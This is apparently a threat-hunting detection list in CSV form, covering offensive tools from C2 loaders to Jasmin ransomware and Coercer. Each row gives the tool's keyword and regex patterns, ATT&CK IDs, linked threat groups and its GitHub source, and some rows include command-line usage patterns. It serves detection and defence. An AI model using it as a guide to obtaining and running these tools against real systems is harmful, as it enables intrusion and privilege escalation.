"*CodeLoad(shellcode)*",".{0,1000}CodeLoad\(shellcode\).{0,1000}","offensive_tool_keyword","cobaltstrike","ShellCode_Loader - Msf&CobaltStrike Antivirus ShellCode loader. Shellcode_encryption - Antivirus Shellcode encryption generation tool. currently tested for Antivirus 360 & Huorong & Computer Manager & Windows Defender (other antivirus software not tested).","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Axx8/ShellCode_Loader","1","0","N/A","10","10","401","48","2022-09-20T07:24:25Z","2022-09-02T14:41:18Z" "*codeLoader/codeLoader.*",".{0,1000}codeLoader\/codeLoader\..{0,1000}","offensive_tool_keyword","C2 related tools","A shellcode loader written using nim","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","N/A","C2","https://github.com/aeverj/NimShellCodeLoader","1","1","N/A","10","10","594","111","2023-12-28T15:23:19Z","2021-01-19T15:57:01Z" "*codesiddhant/jasmin-ransomware*",".{0,1000}codesiddhant\/jasmin\-ransomware.{0,1000}","offensive_tool_keyword","Jasmin-Ransomware","Jasmin Ransomware is an advanced red team tool (WannaCry Clone) used for simulating real ransomware attacks","T1486","TA0040 - TA0002 - TA0010","N/A","N/A","Ransomware","https://github.com/codesiddhant/Jasmin-Ransomware","1","1","N/A","10","2","186","68","2021-03-01T14:51:06Z","2021-02-27T07:09:08Z" "*codewatchorg/bypasswaf*",".{0,1000}codewatchorg\/bypasswaf.{0,1000}","offensive_tool_keyword","bypasswaf","Add headers to all Burp requests to bypass some WAF products","T1090 - T1189 - T1001","TA0002 - TA0040","N/A","N/A","Network Exploitation tools","https://github.com/codewatchorg/bypasswaf","1","1","N/A","N/A","4","326","109","2018-01-28T13:13:39Z","2014-11-17T01:29:35Z" "*codewatchorg/sqlipy*",".{0,1000}codewatchorg\/sqlipy.{0,1000}","offensive_tool_keyword","sqlipy","SQLiPy is a Python plugin for Burp Suite that integrates SQLMap using the SQLMap API.","T1190 - T1210 - T1574","TA0002 - TA0040 - TA0043","N/A","N/A","Network Exploitation tools","https://github.com/codewatchorg/sqlipy","1","1","N/A","N/A","3","250","95","2023-05-08T18:50:41Z","2014-09-22T03:25:42Z" "*codewhitesec/apollon*",".{0,1000}codewhitesec\/apollon.{0,1000}","offensive_tool_keyword","apollon","evade auditd by writing /proc/PID/mem","T1054.001 - T1055.001 - T1012","TA0003 - TA0005","N/A","N/A","Defense Evasion","https://github.com/codewhitesec/apollon","1","1","N/A","8","1","17","6","2023-08-21T05:43:36Z","2023-07-31T11:55:43Z" "*codewhitesec/daphne*",".{0,1000}codewhitesec\/daphne.{0,1000}","offensive_tool_keyword","daphne","evade auditd by tampering via ptrace","T1054.004 - T1012 - T1057","TA0003 - TA0007","N/A","N/A","Defense Evasion","https://github.com/codewhitesec/daphne","1","1","N/A","8","1","15","3","2023-08-03T08:31:40Z","2023-07-31T11:57:29Z" "*CoercedPotato spawn *",".{0,1000}CoercedPotato\sspawn\s.{0,1000}","offensive_tool_keyword","CoercedPotatoRDLL","Reflective DLL to privesc from NT Service to SYSTEM using SeImpersonateToken privilege","T1055 - T1134 - T1548","TA0004 - TA0003 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/sokaRepo/CoercedPotatoRDLL","1","0","N/A","10","2","172","27","2023-11-23T18:58:41Z","2023-11-23T13:22:38Z" "*CoercedPotato.cpp*",".{0,1000}CoercedPotato\.cpp.{0,1000}","offensive_tool_keyword","CoercedPotato","CoercedPotato From Patate (LOCAL/NETWORK SERVICE) to SYSTEM by abusing SeImpersonatePrivilege on Windows 10 Windows 11 and Server 2022.","T1548.002 - T1134.002","TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/Prepouce/CoercedPotato","1","1","N/A","10","3","259","63","2023-11-03T20:58:26Z","2023-09-11T19:04:29Z" "*CoercedPotato.exe*",".{0,1000}CoercedPotato\.exe.{0,1000}","offensive_tool_keyword","CoercedPotato","CoercedPotato From Patate (LOCAL/NETWORK SERVICE) to SYSTEM by abusing SeImpersonatePrivilege on Windows 10 Windows 11 and Server 2022.","T1548.002 - T1134.002","TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/Prepouce/CoercedPotato","1","1","N/A","10","3","259","63","2023-11-03T20:58:26Z","2023-09-11T19:04:29Z" "*CoercedPotato.exe*",".{0,1000}CoercedPotato\.exe.{0,1000}","offensive_tool_keyword","CoercedPotatoRDLL","Reflective DLL to privesc from NT Service to SYSTEM using SeImpersonateToken privilege","T1055 - T1134 - T1548","TA0004 - TA0003 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/sokaRepo/CoercedPotatoRDLL","1","1","N/A","10","2","172","27","2023-11-23T18:58:41Z","2023-11-23T13:22:38Z" "*CoercedPotato.sln*",".{0,1000}CoercedPotato\.sln.{0,1000}","offensive_tool_keyword","CoercedPotato","CoercedPotato From Patate (LOCAL/NETWORK SERVICE) to SYSTEM by abusing SeImpersonatePrivilege on Windows 10 Windows 11 and Server 2022.","T1548.002 - T1134.002","TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/Prepouce/CoercedPotato","1","1","N/A","10","3","259","63","2023-11-03T20:58:26Z","2023-09-11T19:04:29Z" "*CoercedPotato-master*",".{0,1000}CoercedPotato\-master.{0,1000}","offensive_tool_keyword","CoercedPotato","CoercedPotato From Patate (LOCAL/NETWORK SERVICE) to SYSTEM by abusing SeImpersonatePrivilege on Windows 10 Windows 11 and Server 2022.","T1548.002 - T1134.002","TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/Prepouce/CoercedPotato","1","1","N/A","10","3","259","63","2023-11-03T20:58:26Z","2023-09-11T19:04:29Z" "*CoercedPotatoRDLL-main*",".{0,1000}CoercedPotatoRDLL\-main.{0,1000}","offensive_tool_keyword","CoercedPotatoRDLL","Reflective DLL to privesc from NT Service to SYSTEM using SeImpersonateToken privilege","T1055 - T1134 - T1548","TA0004 - TA0003 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/sokaRepo/CoercedPotatoRDLL","1","1","N/A","10","2","172","27","2023-11-23T18:58:41Z","2023-11-23T13:22:38Z" "*CoercePotato coerce*",".{0,1000}CoercePotato\scoerce.{0,1000}","offensive_tool_keyword","CoercedPotatoRDLL","Reflective DLL to privesc from NT Service to SYSTEM using SeImpersonateToken privilege","T1055 - T1134 - T1548","TA0004 - TA0003 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/sokaRepo/CoercedPotatoRDLL","1","0","N/A","10","2","172","27","2023-11-23T18:58:41Z","2023-11-23T13:22:38Z" "*Coercer coerce*",".{0,1000}Coercer\scoerce.{0,1000}","offensive_tool_keyword","Coercer","A python script to automatically coerce a Windows server to authenticate on an arbitrary machine through many methods.","T1110 - T1021 - T1020","TA0006 - TA0010","N/A","N/A","Exploitation tools","https://github.com/p0dalirius/Coercer","1","0","N/A","10","10","1564","175","2024-04-17T07:30:29Z","2022-06-30T16:52:33Z" "*coercer -d * -u *",".{0,1000}coercer\s\-d\s.{0,1000}\s\-u\s.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*Coercer fuzz*",".{0,1000}Coercer\sfuzz.{0,1000}","offensive_tool_keyword","Coercer","A python script to automatically coerce a Windows server to authenticate on an arbitrary machine through many methods.","T1110 - T1021 - T1020","TA0006 - TA0010","N/A","N/A","Exploitation tools","https://github.com/p0dalirius/Coercer","1","0","N/A","10","10","1564","175","2024-04-17T07:30:29Z","2022-06-30T16:52:33Z" "*Coercer scan*",".{0,1000}Coercer\sscan.{0,1000}","offensive_tool_keyword","Coercer","A python script to automatically coerce a Windows server to authenticate on an arbitrary machine through many methods.","T1110 - T1021 - T1020","TA0006 - TA0010","N/A","N/A","Exploitation tools","https://github.com/p0dalirius/Coercer","1","0","N/A","10","10","1564","175","2024-04-17T07:30:29Z","2022-06-30T16:52:33Z" "*coercer.core*",".{0,1000}coercer\.core.{0,1000}","offensive_tool_keyword","Coercer","A python script to automatically coerce a Windows server to authenticate on an arbitrary machine through many methods.","T1110 - T1021 - T1020","TA0006 - TA0010","N/A","N/A","Exploitation tools","https://github.com/p0dalirius/Coercer","1","1","N/A","10","10","1564","175","2024-04-17T07:30:29Z","2022-06-30T16:52:33Z" "*coercer.methods*",".{0,1000}coercer\.methods.{0,1000}","offensive_tool_keyword","Coercer","A python script to automatically coerce a Windows server to authenticate on an arbitrary machine through many methods.","T1110 - T1021 - T1020","TA0006 - TA0010","N/A","N/A","Exploitation tools","https://github.com/p0dalirius/Coercer","1","1","N/A","10","10","1564","175","2024-04-17T07:30:29Z","2022-06-30T16:52:33Z" "*coercer.models*",".{0,1000}coercer\.models.{0,1000}","offensive_tool_keyword","Coercer","A python script to automatically coerce a Windows server to authenticate on an arbitrary machine through many methods.","T1110 - T1021 - T1020","TA0006 - TA0010","N/A","N/A","Exploitation tools","https://github.com/p0dalirius/Coercer","1","1","N/A","10","10","1564","175","2024-04-17T07:30:29Z","2022-06-30T16:52:33Z" "*coercer.network*",".{0,1000}coercer\.network.{0,1000}","offensive_tool_keyword","Coercer","A python script to automatically coerce a Windows server to authenticate on an arbitrary machine through many methods.","T1110 - T1021 - T1020","TA0006 - TA0010","N/A","N/A","Exploitation tools","https://github.com/p0dalirius/Coercer","1","1","N/A","10","10","1564","175","2024-04-17T07:30:29Z","2022-06-30T16:52:33Z" "*coercer.network.DCERPCSession*",".{0,1000}coercer\.network\.DCERPCSession.{0,1000}","offensive_tool_keyword","Coercer","A python script to automatically coerce a Windows server to authenticate on an arbitrary machine through many methods.","T1110 - T1021 - T1020","TA0006 - TA0010","N/A","N/A","Exploitation tools","https://github.com/p0dalirius/Coercer","1","0","N/A","10","10","1564","175","2024-04-17T07:30:29Z","2022-06-30T16:52:33Z" "*coercer.network.smb*",".{0,1000}coercer\.network\.smb.{0,1000}","offensive_tool_keyword","Coercer","A python script to automatically coerce a Windows server to authenticate on an arbitrary machine through many methods.","T1110 - T1021 - T1020","TA0006 - TA0010","N/A","N/A","Exploitation tools","https://github.com/p0dalirius/Coercer","1","0","N/A","10","10","1564","175","2024-04-17T07:30:29Z","2022-06-30T16:52:33Z" "*Coercer.py *",".{0,1000}Coercer\.py\s.{0,1000}","offensive_tool_keyword","Coercer","A python script to automatically coerce a Windows server to authenticate on an arbitrary machine through many methods.","T1110 - T1021 - T1020","TA0006 - TA0010","N/A","N/A","Exploitation tools","https://github.com/p0dalirius/Coercer","1","0","N/A","10","10","1564","175","2024-04-17T07:30:29Z","2022-06-30T16:52:33Z" "*coercer.structures*",".{0,1000}coercer\.structures.{0,1000}","offensive_tool_keyword","Coercer","A python script to automatically coerce a Windows server to authenticate on an arbitrary machine through many methods.","T1110 - T1021 - T1020","TA0006 - TA0010","N/A","N/A","Exploitation tools","https://github.com/p0dalirius/Coercer","1","1","N/A","10","10","1564","175","2024-04-17T07:30:29Z","2022-06-30T16:52:33Z" "*coercer/core/loader*",".{0,1000}coercer\/core\/loader.{0,1000}","offensive_tool_keyword","Coercer","A python script to automatically coerce a Windows server to authenticate on an arbitrary machine through many methods.","T1110 - T1021 - T1020","TA0006 - TA0010","N/A","N/A","Exploitation tools","https://github.com/p0dalirius/Coercer","1","1","N/A","10","10","1564","175","2024-04-17T07:30:29Z","2022-06-30T16:52:33Z" "*coercer_check*",".{0,1000}coercer_check.{0,1000}","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","0","N/A","10","10","1698","250","2024-04-20T09:16:28Z","2021-12-16T22:13:10Z" "*coff_definitions.h*",".{0,1000}coff_definitions\.h.{0,1000}","offensive_tool_keyword","cobaltstrike","Load and execute COFF files and Cobalt Strike BOFs in-memory","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Yaxser/COFFLoader2","1","1","N/A","10","10","181","40","2022-09-13T14:58:30Z","2021-12-14T07:49:17Z" "*COFF_Loader.*",".{0,1000}COFF_Loader\..{0,1000}","offensive_tool_keyword","cobaltstrike","Load and execute COFF files and Cobalt Strike BOFs in-memory","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Yaxser/COFFLoader2","1","1","N/A","10","10","181","40","2022-09-13T14:58:30Z","2021-12-14T07:49:17Z" "*COFF_PREP_BEACON*",".{0,1000}COFF_PREP_BEACON.{0,1000}","offensive_tool_keyword","cobaltstrike","Beacon Object File Loader","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Cracked5pider/CoffeeLdr","1","1","N/A","10","10","267","36","2023-12-03T18:09:34Z","2022-07-18T15:21:11Z" "*CoffeeLdr* go *",".{0,1000}CoffeeLdr.{0,1000}\sgo\s.{0,1000}","offensive_tool_keyword","cobaltstrike","Beacon Object File Loader","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Cracked5pider/CoffeeLdr","1","0","N/A","10","10","267","36","2023-12-03T18:09:34Z","2022-07-18T15:21:11Z" "*CoffeeLdr.x64.exe*",".{0,1000}CoffeeLdr\.x64\.exe.{0,1000}","offensive_tool_keyword","cobaltstrike","Beacon Object File Loader","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Cracked5pider/CoffeeLdr","1","1","N/A","10","10","267","36","2023-12-03T18:09:34Z","2022-07-18T15:21:11Z" "*CoffeeLdr.x86.exe*",".{0,1000}CoffeeLdr\.x86\.exe.{0,1000}","offensive_tool_keyword","cobaltstrike","Beacon Object File Loader","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Cracked5pider/CoffeeLdr","1","1","N/A","10","10","267","36","2023-12-03T18:09:34Z","2022-07-18T15:21:11Z" "*COFFELDR_COFFELDR_H*",".{0,1000}COFFELDR_COFFELDR_H.{0,1000}","offensive_tool_keyword","cobaltstrike","Beacon Object File Loader","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Cracked5pider/CoffeeLdr","1","1","N/A","10","10","267","36","2023-12-03T18:09:34Z","2022-07-18T15:21:11Z" "*coffexec *.o *",".{0,1000}coffexec\s.{0,1000}\.o\s.{0,1000}","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003","N/A","N/A","C2","https://bruteratel.com/","1","0","N/A","10","10","N/A","N/A","N/A","N/A" "*COFFLdr.cpp*",".{0,1000}COFFLdr\.cpp.{0,1000}","offensive_tool_keyword","Jormungandr","Jormungandr is a kernel implementation of a COFF loader allowing kernel developers to load and execute their COFFs in the kernel","T1215 - T1059.003 - T1547.006","TA0004 - TA0005 - TA0002","N/A","N/A","Exploitation tools","https://github.com/Idov31/Jormungandr","1","1","N/A","N/A","3","210","26","2023-09-26T18:06:53Z","2023-06-25T06:24:16Z" "*COFFLdr.exe*",".{0,1000}COFFLdr\.exe.{0,1000}","offensive_tool_keyword","Jormungandr","Jormungandr is a kernel implementation of a COFF loader allowing kernel developers to load and execute their COFFs in the kernel","T1215 - T1059.003 - T1547.006","TA0004 - TA0005 - TA0002","N/A","N/A","Exploitation tools","https://github.com/Idov31/Jormungandr","1","1","N/A","N/A","3","210","26","2023-09-26T18:06:53Z","2023-06-25T06:24:16Z" "*COFFLoader.*",".{0,1000}COFFLoader\..{0,1000}","offensive_tool_keyword","cobaltstrike","This is a quick and dirty COFF loader (AKA Beacon Object Files). Currently can run un-modified BOF's so it can be used for testing without a CS agent running it","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trustedsec/COFFLoader","1","1","N/A","10","10","426","68","2023-05-15T20:42:41Z","2021-02-19T19:14:43Z" "*COFFLoader.x64.dll*",".{0,1000}COFFLoader\.x64\.dll.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","1","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*COFFLoader.x86.dll*",".{0,1000}COFFLoader\.x86\.dll.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","1","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*COFFLoader64.exe*",".{0,1000}COFFLoader64\.exe.{0,1000}","offensive_tool_keyword","cobaltstrike","This is a quick and dirty COFF loader (AKA Beacon Object Files). Currently can run un-modified BOF's so it can be used for testing without a CS agent running it","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trustedsec/COFFLoader","1","1","N/A","10","10","426","68","2023-05-15T20:42:41Z","2021-02-19T19:14:43Z" 